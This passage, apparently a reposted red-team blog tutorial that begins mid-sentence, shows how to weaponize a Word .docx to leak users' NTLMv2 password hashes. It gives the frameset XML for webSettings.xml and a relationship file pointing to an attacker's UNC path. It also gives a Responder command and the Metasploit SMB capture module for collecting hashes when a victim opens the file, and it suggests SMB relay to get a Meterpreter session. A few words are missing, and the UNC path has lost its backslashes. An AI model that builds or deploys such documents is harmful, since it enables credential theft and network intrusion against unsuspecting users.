are playing a vital role towards red team assessments as usually they are used to gain some initial foothold on the client’s internal network. Staying under the radar is a key element as well and this can only be achieved by abusing legitimate functionality of Windows or of a trusted such as Microsoft office.

Historically Microsoft was used as an HTML editor. This means that it can support HTML elements such as framesets. It is therefore possible to link a Microsoft document with a UNC path and combing this with responder in order to capture externally.

Word documents with the docx extension are actually a zip file which contains various XML documents. These XML files are controlling the theme, the fonts, the settings of the document and the web settings. Using 7-zip it is possible to open that archive in order to examine these files:

Docx Contents  - docx contents - Microsoft Office – NTLM Hashes via Frameset

Docx Contents

The word folder contains a file which is called webSettings.xml. This file needs to be modified in order to include the .

webSettings File  - websettings file - Microsoft Office – NTLM Hashes via Frameset

webSettings File

Adding the following code will create a link with another file.

<w:frameset>
<w:framesetSplitbar>
<w:w w:val="60"/>
<w:color w:val="auto"/>
<w:noBorder/>
</w:framesetSplitbar>
<w:frameset>
<w:frame>
<w:name w:val="3"/>
<w:sourceFileName r:id="rId1"/>
<w:linkedToFile/>
</w:frame>
</w:frameset>
</w:frameset>
webSettings XML - Frameset  - websettings xml frameset - Microsoft Office – NTLM Hashes via Frameset

webSettings XML – Frameset

The new webSettings.xml file which contains the frameset needs to be added back to the archive so the previous version will be overwritten.

webSettings with Frameset - Adding new version to archive  - websettings with frameset adding new version to archive - Microsoft Office – NTLM Hashes via Frameset

webSettings with Frameset – Adding new version to archive

A new file (webSettings.xml.rels) must be created in order to contain the relationship ID (rId1) the UNC path and the TargetMode if it is external or internal.

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships
xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/frame" Target="\192.168.1.169Microsoft_Office_Updates.docx" TargetMode="External"/>
</Relationships>
webSettings XML Relationship File - Contents  - websettings xml relationship file contents - Microsoft Office – NTLM Hashes via Frameset

webSettings XML Relationship File – Contents

The _rels directory contains the associated relationships of the document in terms of fonts, styles, themes, settings etc. Planting the new file in that directory will finalize the relationship link which has been created previously via the frameset.

webSettings XML rels  - websettings xml rels - Microsoft Office – NTLM Hashes via Frameset

webSettings XML rels

Now that the Word document has been weaponized to connect to a UNC path over the Internet responder can be configured in order to capture the NTLM hashes.

responder -I wlan0 -e 192.168.1.169 -b -A -v
Frameset - Responder Configuration  - frameset responder configuration - Microsoft Office – NTLM Hashes via Frameset

Responder Configuration

Once the target user open the word document it will try to connect to a UNC path.

Word - Connect to UNC Path via Frameset  - word connect to unc path via frameset - Microsoft Office – NTLM Hashes via Frameset

Word – Connect to UNC Path via Frameset

Responder will retrieve the NTLMv2 hash of the user.

Responder - NTLMv2 Hash via Frameset  - responder ntlmv2 hash via frameset - Microsoft Office – NTLM Hashes via Frameset

Responder – NTLMv2 Hash via Frameset

Alternatively Metasploit Framework can be used instead of Responder in order to capture the password hash.

auxiliary//capture/smb
Metasploit - SMB Capture Module for Frameset  - metasploit smb capture module for frameset - Microsoft Office – NTLM Hashes via Frameset

Metasploit – SMB Capture Module

NTLMv2 hashes will be captured in Metasploit upon opening the document.

Metasploit SMB Capture Module - NTLMv2 Hash via Frameset  - metasploit smb capture module ntlmv2 hash via frameset1 - Microsoft Office – NTLM Hashes via Frameset

Metasploit SMB Capture Module – NTLMv2 Hash via Frameset

Conclusion

This technique can allow the red team to grab domain password hashes from users which can lead to internal network access if 2-factor authentication for VPN access is not enabled and there is a weak password policy. Additionally if the target user is an elevated account such as local administrator or domain admin then this method can be combined with SMB relay in order to obtain a Meterpreter session.



Source link

LEAVE A REPLY

Please enter your comment!
Please enter your name here